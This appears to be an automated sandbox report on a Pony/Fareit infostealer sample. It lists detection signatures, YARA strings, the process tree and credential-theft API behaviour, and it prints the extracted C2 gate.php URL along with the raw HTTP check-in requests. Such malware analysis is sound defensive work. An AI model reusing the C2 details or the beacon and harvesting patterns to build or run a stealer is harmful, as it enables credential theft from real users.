
Windows Analysis Report
AxgZVzUv8m.exe

Overview

General Information

Sample name: AxgZVzUv8m.exe (renamed because original name is a hash value)
Original sample name: 0dc91d39870a081f44b8429dcfbc223f.exe
Analysis ID: 1495035
MD5: 0dc91d39870a081f44b8429dcfbc223f
SHA1: 2033cf336c22ca200e212333a4ebecfc25eeb43f
SHA256: f1114e448e0d95855b4124a0cc4fc0b601e187db29ec697128bee4d776c6eccb
Tags: exe, Pony

Detection

Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Pony
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Injects a PE file into a foreign process
Machine Learning detection for sample
Pony trojan / infostealer detected
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • AxgZVzUv8m.exe (PID: 4004 cmdline: "C:\Users\user\Desktop\AxgZVzUv8m.exe" MD5: 0DC91D39870A081F44B8429DCFBC223F)
    • AxgZVzUv8m.exe (PID: 2744 cmdline: "C:\Users\user\Desktop\AxgZVzUv8m.exe" MD5: 0DC91D39870A081F44B8429DCFBC223F)
      • cmd.exe (PID: 4536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: EvilPony, Ponyshe
Description: Privately modded version of the Pony stealer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony
{"C2 list": ["http://dillion0mill.favcc1.com/gate.php"]}
Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  • Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
  • Rule: JoeSecurity_Pony | Description: Yara detected Pony | Author: Joe Security
  • Rule: Windows_Trojan_Pony_d5516fe8 | Description: unknown | Author: unknown | Strings:
      • 0x16606:$a1: \Global Downloader
      • 0x15d8f:$a2: wiseftpsrvs.bin
      • 0x16466:$a3: SiteServer %d\SFTP
      • 0x1645a:$a4: %s\Keychain
      • 0x166c4:$a5: Connections.txt
      • 0x16a0b:$a6: ftpshell.fsi
      • 0x17166:$a7: inetcomm server passwords
  • Rule: pony | Description: Identify Pony | Author: Brian Wallace @botnet_hunter | Strings:
      • 0x14f91:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x171ad:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x147b3:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
      • 0x14dd4:$s3: POST %s HTTP/1.0
      • 0x14dfd:$s4: Accept-Encoding: identity, *;q=0
      • 0x14f0a:$s4: Accept-Encoding: identity, *;q=0
  • Rule: Fareit | Description: Fareit Payload | Author: kevoreilly | Strings:
      • 0x173fc:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack
  • Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
  • Rule: JoeSecurity_Pony | Description: Yara detected Pony | Author: Joe Security
  • Rule: Windows_Trojan_Pony_d5516fe8 | Description: unknown | Author: unknown | Strings:
      • 0x16606:$a1: \Global Downloader
      • 0x15d8f:$a2: wiseftpsrvs.bin
      • 0x16466:$a3: SiteServer %d\SFTP
      • 0x1645a:$a4: %s\Keychain
      • 0x166c4:$a5: Connections.txt
      • 0x16a0b:$a6: ftpshell.fsi
      • 0x17166:$a7: inetcomm server passwords
  • Rule: pony | Description: Identify Pony | Author: Brian Wallace @botnet_hunter | Strings:
      • 0x14f91:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x171ad:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x147b3:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
      • 0x14dd4:$s3: POST %s HTTP/1.0
      • 0x14dfd:$s4: Accept-Encoding: identity, *;q=0
      • 0x14f0a:$s4: Accept-Encoding: identity, *;q=0
  • Rule: Fareit | Description: Fareit Payload | Author: kevoreilly | Strings:
      • 0x173fc:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
No Sigma rule has matched

Timestamp: 2024-08-19T16:43:43.578383+0200 | SID: 2014562 | Severity: 1 | Source Port: 49708 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-08-19T16:43:44.649406+0200 | SID: 2014562 | Severity: 1 | Source Port: 49710 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected

AV Detection

Source: AxgZVzUv8m.exe | Avira: detected
Source: http://dillion0mill.favcc1.com/gate.phphttp://dillion0mill.favcc1.com/gate.phpYUIPWDFILE0YUIPKDFILE0 | Avira URL Cloud: Label: malware
Source: http://ww25.dillion0mill.favcc1.com/gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940 | Avira URL Cloud: Label: malware
Source: http://dillion0mill.favcc1.com/gate.php | Avira URL Cloud: Label: malware
Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack | Malware Configuration Extractor: Pony {"C2 list": ["http://dillion0mill.favcc1.com/gate.php"]}
Source: AxgZVzUv8m.exe | ReversingLabs: Detection: 60%
Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.3% probability
Source: AxgZVzUv8m.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,3_2_0040A712
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,3_2_0040D3BE
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,3_2_0040BC36
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040A557 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,3_2_0040A557
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,3_2_0040A96D
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,3_2_0040CE3D
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,3_2_0040AB24
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004043DC CryptUnprotectData,LocalFree,3_2_004043DC
Source: AxgZVzUv8m.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: AxgZVzUv8m.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: G:\Projects\DLL3\DLL3\obj\Release\Dll.pdb | source: AxgZVzUv8m.exe, 00000000.00000002.1594363293.0000000006990000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,3_2_004051E3
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_004041A6
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,3_2_00404E73
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_00408AE5
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,3_2_00409832
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_00408961
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Networking

Source: Network traffic | Suricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.8:49708 -> 103.224.212.212:80
Source: Network traffic | Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.8:49708 -> 103.224.212.212:80
Source: Network traffic | Suricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.8:49710 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.8:49710 -> 199.59.243.226:80
Source: Malware configuration extractor | URLs: http://dillion0mill.favcc1.com/gate.php
Source: Joe Sandbox View | IP Address: 103.224.212.212
Source: Joe Sandbox View | IP Address: 199.59.243.226
Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: global traffic | HTTP traffic detected:
    GET /gate.php HTTP/1.0
    Host: dillion0mill.favcc1.com
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic | HTTP traffic detected:
    GET /gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940 HTTP/1.0
    Host: ww25.dillion0mill.favcc1.com
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: AxgZVzUv8m.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: global traffic | DNS traffic detected: DNS query: dillion0mill.favcc1.com
Source: global traffic | DNS traffic detected: DNS query: ww25.dillion0mill.favcc1.com
Source: AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: AxgZVzUv8m.exe, AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://dillion0mill.favcc1.com/gate.php
Source: AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://dillion0mill.favcc1.com/gate.phphttp://dillion0mill.favcc1.com/gate.phpYUIPWDFILE0YUIPKDFILE0
Source: AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: AxgZVzUv8m.exe, AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live

E-Banking Fraud

Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR

System Summary

Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Fareit Payload | Author: kevoreilly
Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Fareit Payload | Author: kevoreilly
Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Fareit Payload | Author: kevoreilly
Source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR | Matched rule: Windows_Trojan_Pony_d5516fe8 | Author: unknown
Source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR | Matched rule: Identify Pony | Author: Brian Wallace @botnet_hunter
Source: Signatures | Results: All Signatures
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 0_2_00AB0B58
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_004121E9
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00402EFD
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: String function: 00404351 appears 51 times
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: String function: 00401D71 appears 139 times
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: String function: 00410808 appears 42 times
Source: AxgZVzUv8m.exe, 00000000.00000002.1591410932.0000000003755000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSCAN_DOC_201407150011693-pdf.exe0 vs AxgZVzUv8m.exe
Source: AxgZVzUv8m.exe, 00000000.00000002.1590463072.000000000051E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs AxgZVzUv8m.exe
Source: AxgZVzUv8m.exe, 00000000.00000000.1585208750.0000000000066000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSCAN_DOC_201407150011693-pdf.exe0 vs AxgZVzUv8m.exe
Source: AxgZVzUv8m.exe, 00000000.00000002.1591303091.00000000026C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs AxgZVzUv8m.exe
Source: AxgZVzUv8m.exe, 00000000.00000002.1594363293.0000000006990000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameDll.dll, vs AxgZVzUv8m.exe
Source: AxgZVzUv8m.exe | Binary or memory string: OriginalFilenameSCAN_DOC_201407150011693-pdf.exe0 vs AxgZVzUv8m.exe
Source: AxgZVzUv8m.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Pony_d5516fe8 | reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: pony | date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Fareit | author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Pony_d5516fe8 | reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: pony | date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Fareit | author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Pony_d5516fe8 | reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: pony | date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Fareit | author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
Source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR | Matched rule: Windows_Trojan_Pony_d5516fe8 | reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR | Matched rule: pony | date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: AxgZVzUv8m.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/1@2/2
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,3_2_0040D3BE
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 0_2_06750DF2 AdjustTokenPrivileges,0_2_06750DF2
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,3_2_00402968
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Code function: 3_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,3_2_00402CE7
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File created: C:\Users\user\AppData\Local\Temp\7041625.bat
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "
Source: AxgZVzUv8m.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AxgZVzUv8m.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AxgZVzUv8m.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File read: C:\Users\user\Desktop\AxgZVzUv8m.exe
Source: unknown | Process created: C:\Users\user\Desktop\AxgZVzUv8m.exe "C:\Users\user\Desktop\AxgZVzUv8m.exe"
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Process created: C:\Users\user\Desktop\AxgZVzUv8m.exe "C:\Users\user\Desktop\AxgZVzUv8m.exe"
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: msi.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | Section loaded: iertutil.dll
